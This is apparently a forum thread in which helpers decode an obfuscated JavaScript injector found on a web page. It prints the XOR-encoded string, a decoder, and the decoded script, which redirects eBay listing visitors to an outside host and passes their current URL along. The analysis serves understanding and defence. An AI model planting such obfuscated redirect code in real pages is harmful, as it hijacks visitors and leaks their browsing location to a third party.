This is how most frame injector code works. To better understand what its doing, start by "beautifying" the code to make it easier to read and work with (a search for javascript beautifier will yield some results).

You will notice that this piece of code contains 1 really long string variable (enkripsi), and 3 more variables (teks, teksasli, and panjang). The code examines each character of enkripsi to generate another string which gets stored in teks. teksasli then gets the unescaped value of teks, and then it does a document.write of teksasli.

The document.write portion is where you want to focus your attention. To see what this is outputting your your page, you can simply add an alert before the document.write:

alert(teksasli);

This will show you what that bit of script is doing.

Thank you very much!
But please help me I do not know how to do. I am a beginner in this area and I have knowledge.
I would be very grateful if you help me to decode this script and if you explain me what it does or can do, if is placed on a website.
Thank you once again and wait for your answer.

As Fotiman told you, once you expand that code a bit it becomes this (enkripsi is one long string -careful not to break it!):

<script>
var enkripsi = "'1Aqapkrv'1Gtcp'02awppglvWPN'1Fuklfmu,nmacvkml'1@kd'0:awppglvWPN,jmqvlcog'1F'1F'05aek,g`c{,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F3'05'0;'5Fgnqg'5@kd'0:awppglvWPN,jmqvlcog'1F'1F'05tk,g`c{fgqa,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F0'05'0;'5Fkd'0:awppglvWPN,jmqvlcog'1F'1F'05nmacnjmqv'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F1'05'0;'5F'5F'1A-qapkrv'1G";

teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++){
teks += String.fromCharCode(enkripsi.charCodeAt(i)^2);
}
teksasli = unescape(teks);
alert(teksasli);
//document.write(teksasli);
</script>

Note I commented out the document.write there and added an alert of teksasli variable before the document.write instead, so if you place that on a page it will alert the decrypted version of the enkripsi variable. The resulting alert gives the following (I decompressed and reformatted from alert somewhat, for visibility):

<script>
var currentURL = window.location;
if (currentURL.hostname == 'cgi.ebay.co.uk') {
window.parent.location.replace('http://api.auctiviaflash.com/getflash2.php?desc='+ window.location +'&d=1');
} else {
if(currentURL.hostname == 'vi.ebaydesc.co.uk') {
window.parent.location.replace('http://api.auctiviaflash.com/getflash2.php?desc='+ window.location +'&d=2');
}
if (currentURL.hostname == 'localhost') {
window.parent.location.replace('http://api.auctiviaflash.com/getflash2.php?desc='+ window.location +'&d=3');
}
}
</script>

So you may see, the original script does a document.write of another script which contains code which basically does a redirect of the user to a different page and captures the users current location and passes it along in the url variables sent to the page you are re-directed to.
Note also how totally stupid the encryption is. Original code was 846 characters (compressed), the code it actually uses is 496 characters (compressed) and easily decrypted - makes no sense to me to try and encrypt it using standard javascript functionality, in an attempt to obfuscate the code, and bloating the code by over 70% in the process.